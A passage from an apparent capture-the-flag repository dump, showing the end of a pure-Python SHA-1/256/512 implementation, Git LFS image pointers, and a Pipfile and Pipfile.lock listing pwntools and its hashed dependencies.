367 |             0x113f9804bef90dae, 0x1b710b35131c471b,
368 |             0x28db77f523047d84, 0x32caab7b40c72493,
369 |             0x3c9ebe0a15c9bebc, 0x431d67c49c100d4c,
370 |             0x4cc5d4becb3e42b6, 0x597f299cfc657e2a,
371 |             0x5fcb6fab3ad6faec, 0x6c44198c4a475817]
372 | 
373 |         for j in range(len(chunk) // 64):
374 |             w.append(int(chunk[j * 64:j * 64 + 64], 2))
375 | 
376 |         for i in range(16, 80):
377 |             s0 = rrot(w[i - 15], 1) ^ rrot(w[i - 15], 8) ^ (w[i - 15] >> 7)
378 |             s1 = rrot(w[i - 2], 19) ^ rrot(w[i - 2], 61) ^ (w[i - 2] >> 6)
379 |             w.append((w[i - 16] + s0 + w[i - 7] + s1) & 0xffffffffffffffff)
380 | 
381 |         a = self._h0
382 |         b = self._h1
383 |         c = self._h2
384 |         d = self._h3
385 |         e = self._h4
386 |         f = self._h5
387 |         g = self._h6
388 |         h = self._h7
389 | 
390 |         for i in range(80):
391 |             s0 = rrot(a, 28) ^ rrot(a, 34) ^ rrot(a, 39)
392 |             maj = (a & b) ^ (a & c) ^ (b & c)
393 |             t2 = s0 + maj
394 |             s1 = rrot(e, 14) ^ rrot(e, 18) ^ rrot(e, 41)
395 |             ch = (e & f) ^ ((~ e) & g)
396 |             t1 = h + s1 + ch + k[i] + w[i]
397 | 
398 |             h = g
399 |             g = f
400 |             f = e
401 |             e = (d + t1) & 0xffffffffffffffff
402 |             d = c
403 |             c = b
404 |             b = a
405 |             a = (t1 + t2) & 0xffffffffffffffff
406 | 
407 |         self._h0 = (self._h0 + a) & 0xffffffffffffffff
408 |         self._h1 = (self._h1 + b) & 0xffffffffffffffff
409 |         self._h2 = (self._h2 + c) & 0xffffffffffffffff
410 |         self._h3 = (self._h3 + d) & 0xffffffffffffffff
411 |         self._h4 = (self._h4 + e) & 0xffffffffffffffff
412 |         self._h5 = (self._h5 + f) & 0xffffffffffffffff
413 |         self._h6 = (self._h6 + g) & 0xffffffffffffffff
414 |         self._h7 = (self._h7 + h) & 0xffffffffffffffff
415 | 
416 | 
417 | def new(algorithm) -> Union[SHA1, SHA256, SHA512]:
418 |     obj = {
419 |         'sha1': SHA1,
420 |         'sha256': SHA256,
421 |         'sha512': SHA512,
422 |     }[algorithm]()
423 |     return obj
424 | 
425 | 
426 | def sha1():
427 |     ''' Returns a new sha1 hash object '''
428 |     return new('sha1')
429 | 
430 | 
431 | def sha256():
432 |     ''' Returns a new sha256 hash object '''
433 |     return new('sha256', )
434 | 
435 | 
436 | def sha512():
437 |     ''' Returns a new sha512 hash object '''
438 |     return new('sha512', )
439 | 
440 | 
441 | __all__ = ('sha1', 'sha256', 'sha512')
442 | 


--------------------------------------------------------------------------------
/crypto/holy-hell/vin-lookup-invalid.png:
--------------------------------------------------------------------------------
1 | version https://git-lfs.github.com/spec/v1
2 | oid sha256:e175c2a066841a7e29f2b6719b8cf7d4034f70d84ff27760379f0df9aa32536b
3 | size 28060
4 | 


--------------------------------------------------------------------------------
/crypto/holy-hell/vin-lookup-valid.png:
--------------------------------------------------------------------------------
1 | version https://git-lfs.github.com/spec/v1
2 | oid sha256:0d68c24b83bbb5fd4f0606b6a97c0bc9c1bf82c488cbd0ca4e18d665e53cfa76
3 | size 64808
4 | 


--------------------------------------------------------------------------------
/pwn/web-server-woes/Pipfile:
--------------------------------------------------------------------------------
 1 | [[source]]
 2 | url = "https://pypi.org/simple"
 3 | verify_ssl = true
 4 | name = "pypi"
 5 | 
 6 | [packages]
 7 | pwntools = "*"
 8 | 
 9 | [dev-packages]
10 | 
11 | [requires]
12 | python_version = "3.11"
13 | python_full_version = "3.11.5"
14 | 


--------------------------------------------------------------------------------
/pwn/web-server-woes/Pipfile.lock:
--------------------------------------------------------------------------------
  1 | {
  2 |     "_meta": {
  3 |         "hash": {
  4 |             "sha256": "cb8ca27e8973133c5e49bc4ddee322c83ef32c3b52ca2306d6a26f14aecd49b8"
  5 |         },
  6 |         "pipfile-spec": 6,
  7 |         "requires": {
  8 |             "python_full_version": "3.11.5",
  9 |             "python_version": "3.11"
 10 |         },
 11 |         "sources": [
 12 |             {
 13 |                 "name": "pypi",
 14 |                 "url": "https://pypi.org/simple",
 15 |                 "verify_ssl": true
 16 |             }
 17 |         ]
 18 |     },
 19 |     "default": {
 20 |         "bcrypt": {
 21 |             "hashes": [
 22 |                 "sha256:089098effa1bc35dc055366740a067a2fc76987e8ec75349eb9484061c54f535",
 23 |                 "sha256:08d2947c490093a11416df18043c27abe3921558d2c03e2076ccb28a116cb6d0",
 24 |                 "sha256:0eaa47d4661c326bfc9d08d16debbc4edf78778e6aaba29c1bc7ce67214d4410",
 25 |                 "sha256:27d375903ac8261cfe4047f6709d16f7d18d39b1ec92aaf72af989552a650ebd",
 26 |                 "sha256:2b3ac11cf45161628f1f3733263e63194f22664bf4d0c0f3ab34099c02134665",
 27 |                 "sha256:2caffdae059e06ac23fce178d31b4a702f2a3264c20bfb5ff541b338194d8fab",
 28 |                 "sha256:3100851841186c25f127731b9fa11909ab7b1df6fc4b9f8353f4f1fd952fbf71",
 29 |                 "sha256:5ad4d32a28b80c5fa6671ccfb43676e8c1cc232887759d1cd7b6f56ea4355215",
 30 |                 "sha256:67a97e1c405b24f19d08890e7ae0c4f7ce1e56a712a016746c8b2d7732d65d4b",
 31 |                 "sha256:705b2cea8a9ed3d55b4491887ceadb0106acf7c6387699fca771af56b1cdeeda",
 32 |                 "sha256:8a68f4341daf7522fe8d73874de8906f3a339048ba406be6ddc1b3ccb16fc0d9",
 33 |                 "sha256:a522427293d77e1c29e303fc282e2d71864579527a04ddcfda6d4f8396c6c36a",
 34 |                 "sha256:ae88eca3024bb34bb3430f964beab71226e761f51b912de5133470b649d82344",
 35 |                 "sha256:b1023030aec778185a6c16cf70f359cbb6e0c289fd564a7cfa29e727a1c38f8f",
 36 |                 "sha256:b3b85202d95dd568efcb35b53936c5e3b3600c7cdcc6115ba461df3a8e89f38d",
 37 |                 "sha256:b57adba8a1444faf784394de3436233728a1ecaeb6e07e8c22c8848f179b893c",
 38 |                 "sha256:bf4fa8b2ca74381bb5442c089350f09a3f17797829d958fad058d6e44d9eb83c",
 39 |                 "sha256:ca3204d00d3cb2dfed07f2d74a25f12fc12f73e606fcaa6975d1f7ae69cacbb2",
 40 |                 "sha256:cbb03eec97496166b704ed663a53680ab57c5084b2fc98ef23291987b525cb7d",
 41 |                 "sha256:e9a51bbfe7e9802b5f3508687758b564069ba937748ad7b9e890086290d2f79e",
 42 |                 "sha256:fbdaec13c5105f0c4e5c52614d04f0bca5f5af007910daa8b6b12095edaa67b3"
 43 |             ],
 44 |             "markers": "python_version >= '3.6'",
 45 |             "version": "==4.0.1"
 46 |         },
 47 |         "capstone": {
 48 |             "hashes": [
 49 |                 "sha256:04223a4e5c2374f21da59c5c5a5b90471bfcef5cb938e7b32de68579cf863b7a",
 50 |                 "sha256:08f16c2782e54d05c95f1d40e1ae0e58e4a57d6a6c3192f8c5ff61476f4130de",
 51 |                 "sha256:1bfa5c81e6880caf41a31946cd6d2d069c048bcc22edf121254b501a048de675",
 52 |                 "sha256:3f34a949699c298e88d7c9a576a2fd7685dba658a9c432bce826eeb88676cf24",
 53 |                 "sha256:4356bdee55639c4448d025dc9d8a3b6c07f2b188c62b88df3d554a84e2cd89af",
 54 |                 "sha256:740a70624d3f258cf8503898dbfd968052c008ddd4fc4ab938c7046c8828c294",
 55 |                 "sha256:740afacc29861db591316beefe30df382c4da08dcb0345a0d10f0cac4f8b1ee2",
 56 |                 "sha256:ea8d0be06d2faa39545937fe88db239fd62227915f9744d8990439011c479f05"
 57 |             ],
 58 |             "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'",
 59 |             "version": "==5.0.1"
 60 |         },
 61 |         "certifi": {
 62 |             "hashes": [
 63 |                 "sha256:539cc1d13202e33ca466e88b2807e29f4c13049d6d87031a3c110744495cb082",
 64 |                 "sha256:92d6037539857d8206b8f6ae472e8b77db8058fec5937a1ef3f54304089edbb9"
 65 |             ],
 66 |             "markers": "python_version >= '3.6'",
 67 |             "version": "==2023.7.22"
 68 |         },
 69 |         "cffi": {
 70 |             "hashes": [
 71 |                 "sha256:0c9ef6ff37e974b73c25eecc13952c55bceed9112be2d9d938ded8e856138bcc",
 72 |                 "sha256:131fd094d1065b19540c3d72594260f118b231090295d8c34e19a7bbcf2e860a",
 73 |                 "sha256:1b8ebc27c014c59692bb2664c7d13ce7a6e9a629be20e54e7271fa696ff2b417",
 74 |                 "sha256:2c56b361916f390cd758a57f2e16233eb4f64bcbeee88a4881ea90fca14dc6ab",
 75 |                 "sha256:2d92b25dbf6cae33f65005baf472d2c245c050b1ce709cc4588cdcdd5495b520",
 76 |                 "sha256:31d13b0f99e0836b7ff893d37af07366ebc90b678b6664c955b54561fc36ef36",
 77 |                 "sha256:32c68ef735dbe5857c810328cb2481e24722a59a2003018885514d4c09af9743",
 78 |                 "sha256:3686dffb02459559c74dd3d81748269ffb0eb027c39a6fc99502de37d501faa8",
 79 |                 "sha256:582215a0e9adbe0e379761260553ba11c58943e4bbe9c36430c4ca6ac74b15ed",
 80 |                 "sha256:5b50bf3f55561dac5438f8e70bfcdfd74543fd60df5fa5f62d94e5867deca684",
 81 |                 "sha256:5bf44d66cdf9e893637896c7faa22298baebcd18d1ddb6d2626a6e39793a1d56",
 82 |                 "sha256:6602bc8dc6f3a9e02b6c22c4fc1e47aa50f8f8e6d3f78a5e16ac33ef5fefa324",
 83 |                 "sha256:673739cb539f8cdaa07d92d02efa93c9ccf87e345b9a0b556e3ecc666718468d",
 84 |                 "sha256:68678abf380b42ce21a5f2abde8efee05c114c2fdb2e9eef2efdb0257fba1235",
 85 |                 "sha256:68e7c44931cc171c54ccb702482e9fc723192e88d25a0e133edd7aff8fcd1f6e",
 86 |                 "sha256:6b3d6606d369fc1da4fd8c357d026317fbb9c9b75d36dc16e90e84c26854b088",
 87 |                 "sha256:748dcd1e3d3d7cd5443ef03ce8685043294ad6bd7c02a38d1bd367cfd968e000",
 88 |                 "sha256:7651c50c8c5ef7bdb41108b7b8c5a83013bfaa8a935590c5d74627c047a583c7",
 89 |                 "sha256:7b78010e7b97fef4bee1e896df8a4bbb6712b7f05b7ef630f9d1da00f6444d2e",
 90 |                 "sha256:7e61e3e4fa664a8588aa25c883eab612a188c725755afff6289454d6362b9673",
 91 |                 "sha256:80876338e19c951fdfed6198e70bc88f1c9758b94578d5a7c4c91a87af3cf31c",
 92 |                 "sha256:8895613bcc094d4a1b2dbe179d88d7fb4a15cee43c052e8885783fac397d91fe",
 93 |                 "sha256:88e2b3c14bdb32e440be531ade29d3c50a1a59cd4e51b1dd8b0865c54ea5d2e2",
 94 |                 "sha256:8f8e709127c6c77446a8c0a8c8bf3c8ee706a06cd44b1e827c3e6a2ee6b8c098",
 95 |                 "sha256:9cb4a35b3642fc5c005a6755a5d17c6c8b6bcb6981baf81cea8bfbc8903e8ba8",
 96 |                 "sha256:9f90389693731ff1f659e55c7d1640e2ec43ff725cc61b04b2f9c6d8d017df6a",
 97 |                 "sha256:a09582f178759ee8128d9270cd1344154fd473bb77d94ce0aeb2a93ebf0feaf0",
 98 |                 "sha256:a6a14b17d7e17fa0d207ac08642c8820f84f25ce17a442fd15e27ea18d67c59b",
 99 |                 "sha256:a72e8961a86d19bdb45851d8f1f08b041ea37d2bd8d4fd19903bc3083d80c896",
100 |                 "sha256:abd808f9c129ba2beda4cfc53bde801e5bcf9d6e0f22f095e45327c038bfe68e",
101 |                 "sha256:ac0f5edd2360eea2f1daa9e26a41db02dd4b0451b48f7c318e217ee092a213e9",
102 |                 "sha256:b29ebffcf550f9da55bec9e02ad430c992a87e5f512cd63388abb76f1036d8d2",
103 |                 "sha256:b2ca4e77f9f47c55c194982e10f058db063937845bb2b7a86c84a6cfe0aefa8b",
104 |                 "sha256:b7be2d771cdba2942e13215c4e340bfd76398e9227ad10402a8767ab1865d2e6",
105 |                 "sha256:b84834d0cf97e7d27dd5b7f3aca7b6e9263c56308ab9dc8aae9784abb774d404",
106 |                 "sha256:b86851a328eedc692acf81fb05444bdf1891747c25af7529e39ddafaf68a4f3f",
107 |                 "sha256:bcb3ef43e58665bbda2fb198698fcae6776483e0c4a631aa5647806c25e02cc0",
108 |                 "sha256:c0f31130ebc2d37cdd8e44605fb5fa7ad59049298b3f745c74fa74c62fbfcfc4",
109 |                 "sha256:c6a164aa47843fb1b01e941d385aab7215563bb8816d80ff3a363a9f8448a8dc",
110 |                 "sha256:d8a9d3ebe49f084ad71f9269834ceccbf398253c9fac910c4fd7053ff1386936",
111 |                 "sha256:db8e577c19c0fda0beb7e0d4e09e0ba74b1e4c092e0e40bfa12fe05b6f6d75ba",
112 |                 "sha256:dc9b18bf40cc75f66f40a7379f6a9513244fe33c0e8aa72e2d56b0196a7ef872",
113 |                 "sha256:e09f3ff613345df5e8c3667da1d918f9149bd623cd9070c983c013792a9a62eb",
114 |                 "sha256:e4108df7fe9b707191e55f33efbcb2d81928e10cea45527879a4749cbe472614",
115 |                 "sha256:e6024675e67af929088fda399b2094574609396b1decb609c55fa58b028a32a1",
116 |                 "sha256:e70f54f1796669ef691ca07d046cd81a29cb4deb1e5f942003f401c0c4a2695d",
117 |                 "sha256:e715596e683d2ce000574bae5d07bd522c781a822866c20495e52520564f0969",
118 |                 "sha256:e760191dd42581e023a68b758769e2da259b5d52e3103c6060ddc02c9edb8d7b",
119 |                 "sha256:ed86a35631f7bfbb28e108dd96773b9d5a6ce4811cf6ea468bb6a359b256b1e4",
120 |                 "sha256:ee07e47c12890ef248766a6e55bd38ebfb2bb8edd4142d56db91b21ea68b7627",
121 |                 "sha256:fa3a0128b152627161ce47201262d3140edb5a5c3da88d73a1b790a959126956",
122 |                 "sha256:fcc8eb6d5902bb1cf6dc4f187ee3ea80a1eba0a89aba40a5cb20a5087d961357"
123 |             ],
124 |             "markers": "python_version >= '3.8'",
125 |             "version": "==1.16.0"
126 |         },
127 |         "charset-normalizer": {
128 |             "hashes": [
129 |                 "sha256:02673e456dc5ab13659f85196c534dc596d4ef260e4d86e856c3b2773ce09843",
130 |                 "sha256:02af06682e3590ab952599fbadac535ede5d60d78848e555aa58d0c0abbde786",
131 |                 "sha256:03680bb39035fbcffe828eae9c3f8afc0428c91d38e7d61aa992ef7a59fb120e",
132 |                 "sha256:0570d21da019941634a531444364f2482e8db0b3425fcd5ac0c36565a64142c8",
133 |                 "sha256:09c77f964f351a7369cc343911e0df63e762e42bac24cd7d18525961c81754f4",
134 |                 "sha256:0d3d5b7db9ed8a2b11a774db2bbea7ba1884430a205dbd54a32d61d7c2a190fa",
135 |                 "sha256:1063da2c85b95f2d1a430f1c33b55c9c17ffaf5e612e10aeaad641c55a9e2b9d",
136 |                 "sha256:12ebea541c44fdc88ccb794a13fe861cc5e35d64ed689513a5c03d05b53b7c82",
137 |                 "sha256:153e7b6e724761741e0974fc4dcd406d35ba70b92bfe3fedcb497226c93b9da7",
138 |                 "sha256:15b26ddf78d57f1d143bdf32e820fd8935d36abe8a25eb9ec0b5a71c82eb3895",
139 |                 "sha256:1872d01ac8c618a8da634e232f24793883d6e456a66593135aeafe3784b0848d",
140 |                 "sha256:187d18082694a29005ba2944c882344b6748d5be69e3a89bf3cc9d878e548d5a",
141 |                 "sha256:1b2919306936ac6efb3aed1fbf81039f7087ddadb3160882a57ee2ff74fd2382",
142 |                 "sha256:232ac332403e37e4a03d209a3f92ed9071f7d3dbda70e2a5e9cff1c4ba9f0678",
143 |                 "sha256:23e8565ab7ff33218530bc817922fae827420f143479b753104ab801145b1d5b",
144 |                 "sha256:24817cb02cbef7cd499f7c9a2735286b4782bd47a5b3516a0e84c50eab44b98e",
145 |                 "sha256:249c6470a2b60935bafd1d1d13cd613f8cd8388d53461c67397ee6a0f5dce741",
146 |                 "sha256:24a91a981f185721542a0b7c92e9054b7ab4fea0508a795846bc5b0abf8118d4",
147 |                 "sha256:2502dd2a736c879c0f0d3e2161e74d9907231e25d35794584b1ca5284e43f596",
148 |                 "sha256:250c9eb0f4600361dd80d46112213dff2286231d92d3e52af1e5a6083d10cad9",
149 |                 "sha256:278c296c6f96fa686d74eb449ea1697f3c03dc28b75f873b65b5201806346a69",
150 |                 "sha256:2935ffc78db9645cb2086c2f8f4cfd23d9b73cc0dc80334bc30aac6f03f68f8c",
151 |                 "sha256:2f4a0033ce9a76e391542c182f0d48d084855b5fcba5010f707c8e8c34663d77",
152 |                 "sha256:30a85aed0b864ac88309b7d94be09f6046c834ef60762a8833b660139cfbad13",
153 |                 "sha256:380c4bde80bce25c6e4f77b19386f5ec9db230df9f2f2ac1e5ad7af2caa70459",
154 |                 "sha256:3ae38d325b512f63f8da31f826e6cb6c367336f95e418137286ba362925c877e",
155 |                 "sha256:3b447982ad46348c02cb90d230b75ac34e9886273df3a93eec0539308a6296d7",
156 |                 "sha256:3debd1150027933210c2fc321527c2299118aa929c2f5a0a80ab6953e3bd1908",
157 |                 "sha256:4162918ef3098851fcd8a628bf9b6a98d10c380725df9e04caf5ca6dd48c847a",
158 |                 "sha256:468d2a840567b13a590e67dd276c570f8de00ed767ecc611994c301d0f8c014f",
159 |                 "sha256:4cc152c5dd831641e995764f9f0b6589519f6f5123258ccaca8c6d34572fefa8",
160 |                 "sha256:542da1178c1c6af8873e143910e2269add130a299c9106eef2594e15dae5e482",
161 |                 "sha256:557b21a44ceac6c6b9773bc65aa1b4cc3e248a5ad2f5b914b91579a32e22204d",
162 |                 "sha256:5707a746c6083a3a74b46b3a631d78d129edab06195a92a8ece755aac25a3f3d",
163 |                 "sha256:588245972aca710b5b68802c8cad9edaa98589b1b42ad2b53accd6910dad3545",
164 |                 "sha256:5adf257bd58c1b8632046bbe43ee38c04e1038e9d37de9c57a94d6bd6ce5da34",
165 |                 "sha256:619d1c96099be5823db34fe89e2582b336b5b074a7f47f819d6b3a57ff7bdb86",
166 |                 "sha256:63563193aec44bce707e0c5ca64ff69fa72ed7cf34ce6e11d5127555756fd2f6",
167 |                 "sha256:67b8cc9574bb518ec76dc8e705d4c39ae78bb96237cb533edac149352c1f39fe",
168 |                 "sha256:6a685067d05e46641d5d1623d7c7fdf15a357546cbb2f71b0ebde91b175ffc3e",
169 |                 "sha256:70f1d09c0d7748b73290b29219e854b3207aea922f839437870d8cc2168e31cc",
170 |                 "sha256:750b446b2ffce1739e8578576092179160f6d26bd5e23eb1789c4d64d5af7dc7",
171 |                 "sha256:7966951325782121e67c81299a031f4c115615e68046f79b85856b86ebffc4cd",
172 |                 "sha256:7b8b8bf1189b3ba9b8de5c8db4d541b406611a71a955bbbd7385bbc45fcb786c",
173 |                 "sha256:7f5d10bae5d78e4551b7be7a9b29643a95aded9d0f602aa2ba584f0388e7a557",
174 |                 "sha256:805dfea4ca10411a5296bcc75638017215a93ffb584c9e344731eef0dcfb026a",
175 |                 "sha256:81bf654678e575403736b85ba3a7867e31c2c30a69bc57fe88e3ace52fb17b89",
176 |                 "sha256:82eb849f085624f6a607538ee7b83a6d8126df6d2f7d3b319cb837b289123078",
177 |                 "sha256:85a32721ddde63c9df9ebb0d2045b9691d9750cb139c161c80e500d210f5e26e",
178 |                 "sha256:86d1f65ac145e2c9ed71d8ffb1905e9bba3a91ae29ba55b4c46ae6fc31d7c0d4",
179 |                 "sha256:86f63face3a527284f7bb8a9d4f78988e3c06823f7bea2bd6f0e0e9298ca0403",
180 |                 "sha256:8eaf82f0eccd1505cf39a45a6bd0a8cf1c70dcfc30dba338207a969d91b965c0",
181 |                 "sha256:93aa7eef6ee71c629b51ef873991d6911b906d7312c6e8e99790c0f33c576f89",
182 |                 "sha256:96c2b49eb6a72c0e4991d62406e365d87067ca14c1a729a870d22354e6f68115",
183 |                 "sha256:9cf3126b85822c4e53aa28c7ec9869b924d6fcfb76e77a45c44b83d91afd74f9",
184 |                 "sha256:9fe359b2e3a7729010060fbca442ca225280c16e923b37db0e955ac2a2b72a05",
185 |                 "sha256:a0ac5e7015a5920cfce654c06618ec40c33e12801711da6b4258af59a8eff00a",
186 |                 "sha256:a3f93dab657839dfa61025056606600a11d0b696d79386f974e459a3fbc568ec",
187 |                 "sha256:a4b71f4d1765639372a3b32d2638197f5cd5221b19531f9245fcc9ee62d38f56",
188 |                 "sha256:aae32c93e0f64469f74ccc730a7cb21c7610af3a775157e50bbd38f816536b38",
189 |                 "sha256:aaf7b34c5bc56b38c931a54f7952f1ff0ae77a2e82496583b247f7c969eb1479",
190 |                 "sha256:abecce40dfebbfa6abf8e324e1860092eeca6f7375c8c4e655a8afb61af58f2c",
191 |                 "sha256:abf0d9f45ea5fb95051c8bfe43cb40cda383772f7e5023a83cc481ca2604d74e",
192 |                 "sha256:ac71b2977fb90c35d41c9453116e283fac47bb9096ad917b8819ca8b943abecd",
193 |                 "sha256:ada214c6fa40f8d800e575de6b91a40d0548139e5dc457d2ebb61470abf50186",
194 |                 "sha256:b09719a17a2301178fac4470d54b1680b18a5048b481cb8890e1ef820cb80455",
195 |                 "sha256:b1121de0e9d6e6ca08289583d7491e7fcb18a439305b34a30b20d8215922d43c",
196 |                 "sha256:b3b2316b25644b23b54a6f6401074cebcecd1244c0b8e80111c9a3f1c8e83d65",
197 |                 "sha256:b3d9b48ee6e3967b7901c052b670c7dda6deb812c309439adaffdec55c6d7b78",
198 |                 "sha256:b5bcf60a228acae568e9911f410f9d9e0d43197d030ae5799e20dca8df588287",
199 |                 "sha256:b8f3307af845803fb0b060ab76cf6dd3a13adc15b6b451f54281d25911eb92df",
200 |                 "sha256:c2af80fb58f0f24b3f3adcb9148e6203fa67dd3f61c4af146ecad033024dde43",
201 |                 "sha256:c350354efb159b8767a6244c166f66e67506e06c8924ed74669b2c70bc8735b1",
202 |                 "sha256:c5a74c359b2d47d26cdbbc7845e9662d6b08a1e915eb015d044729e92e7050b7",
203 |                 "sha256:c71f16da1ed8949774ef79f4a0260d28b83b3a50c6576f8f4f0288d109777989",
204 |                 "sha256:d47ecf253780c90ee181d4d871cd655a789da937454045b17b5798da9393901a",
205 |                 "sha256:d7eff0f27edc5afa9e405f7165f85a6d782d308f3b6b9d96016c010597958e63",
206 |                 "sha256:d97d85fa63f315a8bdaba2af9a6a686e0eceab77b3089af45133252618e70884",
207 |                 "sha256:db756e48f9c5c607b5e33dd36b1d5872d0422e960145b08ab0ec7fd420e9d649",
208 |                 "sha256:dc45229747b67ffc441b3de2f3ae5e62877a282ea828a5bdb67883c4ee4a8810",
209 |                 "sha256:e0fc42822278451bc13a2e8626cf2218ba570f27856b536e00cfa53099724828",
210 |                 "sha256:e39c7eb31e3f5b1f88caff88bcff1b7f8334975b46f6ac6e9fc725d829bc35d4",
211 |                 "sha256:e46cd37076971c1040fc8c41273a8b3e2c624ce4f2be3f5dfcb7a430c1d3acc2",
212 |                 "sha256:e5c1502d4ace69a179305abb3f0bb6141cbe4714bc9b31d427329a95acfc8bdd",
213 |                 "sha256:edfe077ab09442d4ef3c52cb1f9dab89bff02f4524afc0acf2d46be17dc479f5",
214 |                 "sha256:effe5406c9bd748a871dbcaf3ac69167c38d72db8c9baf3ff954c344f31c4cbe",
215 |                 "sha256:f0d1e3732768fecb052d90d62b220af62ead5748ac51ef61e7b32c266cac9293",
216 |                 "sha256:f5969baeaea61c97efa706b9b107dcba02784b1601c74ac84f2a532ea079403e",
217 |                 "sha256:f8888e31e3a85943743f8fc15e71536bda1c81d5aa36d014a3c0c44481d7db6e",
218 |                 "sha256:fc52b79d83a3fe3a360902d3f5d79073a993597d48114c29485e9431092905d8"
219 |             ],
220 |             "markers": "python_full_version >= '3.7.0'",
221 |             "version": "==3.3.0"
222 |         },
223 |         "colored-traceback": {
224 |             "hashes": [
225 |                 "sha256:6da7ce2b1da869f6bb54c927b415b95727c4bb6d9a84c4615ea77d9872911b05",
226 |                 "sha256:f76c21a4b4c72e9e09763d4d1b234afc469c88693152a763ad6786467ef9e79f"
227 |             ],
228 |             "version": "==0.3.0"
229 |         },
230 |         "cryptography": {
231 |             "hashes": [
232 |                 "sha256:004b6ccc95943f6a9ad3142cfabcc769d7ee38a3f60fb0dddbfb431f818c3a67",
233 |                 "sha256:047c4603aeb4bbd8db2756e38f5b8bd7e94318c047cfe4efeb5d715e08b49311",
234 |                 "sha256:0d9409894f495d465fe6fda92cb70e8323e9648af912d5b9141d616df40a87b8",
235 |                 "sha256:23a25c09dfd0d9f28da2352503b23e086f8e78096b9fd585d1d14eca01613e13",
236 |                 "sha256:2ed09183922d66c4ec5fdaa59b4d14e105c084dd0febd27452de8f6f74704143",
237 |                 "sha256:35c00f637cd0b9d5b6c6bd11b6c3359194a8eba9c46d4e875a3660e3b400005f",
238 |                 "sha256:37480760ae08065437e6573d14be973112c9e6dcaf5f11d00147ee74f37a3829",
239 |                 "sha256:3b224890962a2d7b57cf5eeb16ccaafba6083f7b811829f00476309bce2fe0fd",
240 |                 "sha256:5a0f09cefded00e648a127048119f77bc2b2ec61e736660b5789e638f43cc397",
241 |                 "sha256:5b72205a360f3b6176485a333256b9bcd48700fc755fef51c8e7e67c4b63e3ac",
242 |                 "sha256:7e53db173370dea832190870e975a1e09c86a879b613948f09eb49324218c14d",
243 |                 "sha256:7febc3094125fc126a7f6fb1f420d0da639f3f32cb15c8ff0dc3997c4549f51a",
244 |                 "sha256:80907d3faa55dc5434a16579952ac6da800935cd98d14dbd62f6f042c7f5e839",
245 |                 "sha256:86defa8d248c3fa029da68ce61fe735432b047e32179883bdb1e79ed9bb8195e",
246 |                 "sha256:8ac4f9ead4bbd0bc8ab2d318f97d85147167a488be0e08814a37eb2f439d5cf6",
247 |                 "sha256:93530900d14c37a46ce3d6c9e6fd35dbe5f5601bf6b3a5c325c7bffc030344d9",
248 |                 "sha256:9eeb77214afae972a00dee47382d2591abe77bdae166bda672fb1e24702a3860",
249 |                 "sha256:b5f4dfe950ff0479f1f00eda09c18798d4f49b98f4e2006d644b3301682ebdca",
250 |                 "sha256:c3391bd8e6de35f6f1140e50aaeb3e2b3d6a9012536ca23ab0d9c35ec18c8a91",
251 |                 "sha256:c880eba5175f4307129784eca96f4e70b88e57aa3f680aeba3bab0e980b0f37d",
252 |                 "sha256:cecfefa17042941f94ab54f769c8ce0fe14beff2694e9ac684176a2535bf9714",
253 |                 "sha256:e40211b4923ba5a6dc9769eab704bdb3fbb58d56c5b336d30996c24fcf12aadb",
254 |                 "sha256:efc8ad4e6fc4f1752ebfb58aefece8b4e3c4cae940b0994d43649bdfce8d0d4f"
255 |             ],
256 |             "markers": "python_version >= '3.7'",
257 |             "version": "==41.0.4"
258 |         },
259 |         "idna": {
260 |             "hashes": [
261 |                 "sha256:814f528e8dead7d329833b91c5faa87d60bf71824cd12a7530b5526063d02cb4",
262 |                 "sha256:90b77e79eaa3eba6de819a0c442c0b4ceefc341a7a2ab77d7562bf49f425c5c2"
263 |             ],
264 |             "markers": "python_version >= '3.5'",
265 |             "version": "==3.4"
266 |         },
267 |         "intervaltree": {
268 |             "hashes": [
269 |                 "sha256:902b1b88936918f9b2a19e0e5eb7ccb430ae45cde4f39ea4b36932920d33952d"
270 |             ],
271 |             "version": "==3.1.0"
272 |         },
273 |         "mako": {
274 |             "hashes": [
275 |                 "sha256:c97c79c018b9165ac9922ae4f32da095ffd3c4e6872b45eded42926deea46818",
276 |                 "sha256:d60a3903dc3bb01a18ad6a89cdbe2e4eadc69c0bc8ef1e3773ba53d44c3f7a34"
277 |             ],
278 |             "markers": "python_version >= '3.7'",
279 |             "version": "==1.2.4"
280 |         },
281 |         "markupsafe": {
282 |             "hashes": [
283 |                 "sha256:05fb21170423db021895e1ea1e1f3ab3adb85d1c2333cbc2310f2a26bc77272e",
284 |                 "sha256:0a4e4a1aff6c7ac4cd55792abf96c915634c2b97e3cc1c7129578aa68ebd754e",
285 |                 "sha256:10bbfe99883db80bdbaff2dcf681dfc6533a614f700da1287707e8a5d78a8431",
286 |                 "sha256:134da1eca9ec0ae528110ccc9e48041e0828d79f24121a1a146161103c76e686",
287 |                 "sha256:14ff806850827afd6b07a5f32bd917fb7f45b046ba40c57abdb636674a8b559c",
288 |                 "sha256:1577735524cdad32f9f694208aa75e422adba74f1baee7551620e43a3141f559",
289 |                 "sha256:1b40069d487e7edb2676d3fbdb2b0829ffa2cd63a2ec26c4938b2d34391b4ecc",
290 |                 "sha256:1b8dd8c3fd14349433c79fa8abeb573a55fc0fdd769133baac1f5e07abf54aeb",
291 |                 "sha256:1f67c7038d560d92149c060157d623c542173016c4babc0c1913cca0564b9939",
292 |                 "sha256:282c2cb35b5b673bbcadb33a585408104df04f14b2d9b01d4c345a3b92861c2c",
293 |                 "sha256:2c1b19b3aaacc6e57b7e25710ff571c24d6c3613a45e905b1fde04d691b98ee0",
294 |                 "sha256:2ef12179d3a291be237280175b542c07a36e7f60718296278d8593d21ca937d4",
295 |                 "sha256:338ae27d6b8745585f87218a3f23f1512dbf52c26c28e322dbe54bcede54ccb9",
296 |                 "sha256:3c0fae6c3be832a0a0473ac912810b2877c8cb9d76ca48de1ed31e1c68386575",
297 |                 "sha256:3fd4abcb888d15a94f32b75d8fd18ee162ca0c064f35b11134be77050296d6ba",
298 |                 "sha256:42de32b22b6b804f42c5d98be4f7e5e977ecdd9ee9b660fda1a3edf03b11792d",
299 |                 "sha256:47d4f1c5f80fc62fdd7777d0d40a2e9dda0a05883ab11374334f6c4de38adffd",
300 |                 "sha256:504b320cd4b7eff6f968eddf81127112db685e81f7e36e75f9f84f0df46041c3",
301 |                 "sha256:525808b8019e36eb524b8c68acdd63a37e75714eac50e988180b169d64480a00",
302 |                 "sha256:56d9f2ecac662ca1611d183feb03a3fa4406469dafe241673d521dd5ae92a155",
